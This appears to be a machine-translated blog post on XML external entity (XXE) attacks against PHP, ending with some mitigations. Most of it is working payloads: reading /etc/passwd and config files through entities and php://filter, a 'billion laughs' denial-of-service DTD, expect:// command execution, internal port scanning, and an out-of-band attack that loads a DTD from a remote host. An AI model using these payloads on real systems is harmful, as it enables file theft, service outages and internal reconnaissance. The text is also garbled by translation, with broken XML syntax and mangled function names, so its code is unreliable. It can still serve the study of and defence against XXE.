PHP XXe attack

PHP Entites:

Pre-defined:&<& #37;

General entity: <! ENTITY General "Hello", call mode: in <a>&general;</a>, cannot be included in the attribute.

Parametric entity: <! ENTITY% param "world";, call method, immediate use:%param;

Both the general entity and the parameter entity can contain internal resources (DTDs) and external resources

Harm:

(1) Local file read

<?xml version= "1.0" encoding= "Utf-8"?>
<! DOCTYPE Xdsec [<! ENTITY XXe SYSTEM "FILE:///ETC/PASSWD" >]>
<methodname>&xxe;</methodname>

(2) Dos attacks (Access/dev/zero), nested interpretation entities

<?xml version= "1.0"?>

<! DOCTYPE Lolz [

<! ENTITY lol "LOL" >

<! ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;" >

<! ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2 ;" >

<! ENTITY Lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3 ;" >

<! ENTITY Lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4 ;" >

<! ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5 ;" >

<! ENTITY Lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6 ;" >

<! ENTITY Lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7 ;" >

<! ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8 ;" >

]>

<lolz>&lol9;</lolz>

(3) Resources in LAN

(4) port scan (http://192.168.1.3:22)

(5) Take advantage of some protocol takeaway resources (Php:http,java:gopher (low version), FTP (high version))

(6) Execute the command, if PHP supports the expect extension, it can execute the system command, eg:<! ENTITY a SYSTEM ' expect://uname ' >

General use of ideas:

1, normal output

2, using error information, such as parsing XML errors, Dtd,schema check

Xml:web.xml,tomcat-users.xml,jetty.xml,httpd.conf of interest in the 3,web system

Takeaway: Php://filter/convert.base64-encode/resource=web.xml

Allow_url_fopen = On

4,blind techniques, XSD values bruteforce

Analytic algorithm for parameter entities:

To load an external entity, eg:

<?xml version= "1.0" encoding= "Uq-8"?>

<! DOCTYPE HTML [<! ENTITY % Internal SYSTEM "Local_file.xml" >

%internal;] >

Local_file.xml:

<! ENTITY title "Hello, world!" >

The parsed effect is:

%internal; To replace with <! ENTITY title "Hello, world!" >

Out-of-band attack:

test.php

<?php

Libxml_use_internal_errors (TRUE);

Libxml_disable_entity_loader ();

$xml 1=<<<eof

<?xml version= "1.0" encoding= "UTF-8" standalone= "no"?>

<! DOCTYPE any [

<! ENTITY XXe SYSTEM "FILE:///ETC/PASSWD" >

]>

<x>&xxe; </x>

EOF;

$dom 1 = new DOMDocument ();

$dom 1->loadxml ($xml 1);

Print_r ($dom 1);

$fields = $dom 1->getelementsbytagname (' x ');

foreach ($fields as $field)

{

Print_r ($field->nodename);

Print_r ($field->textcontent);

}

Print_r ($dom 1->savexml ());

$xx = simplexml_load_string ($xml 1);

Print_r ($XX);

Print_r (Libxml_get_errors ());

Libxml_clear_errors ();

Print_r ("Enderror");

?>

Allow_url_fopen=0 the SYSTEM "http://127.0.0.1:22" is not allowed in entity, FTP is the same

The normal entity can only be in the content box, not allowed to appear in the attribute, such as <a>&xxe;</a>

In the experimental process encountered through Print_r ($dom->savexml ()) did not parse the content, through strace tracking, found that access to/etc/passwd, but there is no output, only the output of the content before the unresolved &xxe; have been visited, why not output it? It is possible that the output function does not work, in another way to access the content, it is normal output.

Php-i get compiled information, including supported modules, such as finding the Libxml in the DOM:

Dom

Dom/xml = Enabled
Dom/xml API Version = 20031129
Libxml Version = 2.7.8
HTML support = = enabled
XPath support = = enabled
XPointer support = Enabled
Schema support = Enabled
Relaxng support = Enabled

Libxml

LibXML support = + Active
LibXML Compiled Version = 2.7.8
LibXML Loaded Version = 20708

LibXML streams = Enabled

SimpleXML

Simplexml support = Enabled
Revision = $Revision: 314376 $
Schema support = Enabled

Xml

XML support = = Active
XML Namespace support = = Active
LIBXML2 Version = 2.7.8

Which is made up of XML, SVG format, docs format, xml,xlsx

There is a problem with the following function: Domdocument.loadxml (), Simple_xml_loadfile and XmlReader function, load ()

Transfer tips:

<?xml version= "1.0"? ><! DOCTYPE results [

<! ENTITY harmless SYSTEM "Php://filter/read=convert.base64-encode/resource=/var/www/config.ini" >]><results > <result>&harmless;</result></results>

How to introduce external entities:

test.php

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/6B/FB/wKioL1U8xEuCoW2CAADeS8-2V5A708.jpg "title=" Test_ Php.png "alt=" Wkiol1u8xeucow2caades8-2v5a708.jpg "/>

EVIL.DTD:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/6B/FF/wKiom1U8wvnRKvWiAAB3nzE9Omc234.jpg "title=" Evil_ Php.png "alt=" Wkiom1u8wvnrkvwiaab3nze9omc234.jpg "/>

Results:

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/6B/FB/wKioL1U8xHPSBLEJAAFnQcIB2GM494.jpg "title=" Result.png "alt=" Wkiol1u8xhpsblejaafnqcib2gm494.jpg "/>

(2) in the properties, only PHP can

test1.php

$xml 1=<<<eof
<?xml version= "1.0" encoding= "UTF-8" standalone= "no"?>
<! DOCTYPE Root [
<! ENTITY% remote SYSTEM "HTTP://10.65.60.111/EVIL.DTD2" >
%remote;
%param1;
<root attrib= "&internal;" />
EOF;

EVIL.DTD2:

<! ENTITY% Payload SYSTEM "FILE:///ETC/PASSWD" >
<! ENTITY% param1 "<! ENTITY internal '%payload; ' > ">

Unsuccessful, general report internal error

Solution:

1, upgrade the LIBXML2 library version to more than 2.9, from more than 2.9 does not default to execute external entities.

2, perform Libxml_disable_entity_loader (true) before using import, disable entity

3, if it is resolved using XmlReader or Dom method,

$doc = Xmlreader::xml ($badXml, ' UTF-8 ', libxml_nonet); With the DOM functionality:

$dom = new DOMDocument (); $dom->loadxml ($badXml, libxml_dtdload| LIBXML_DTDATTR)

PHP XXe attack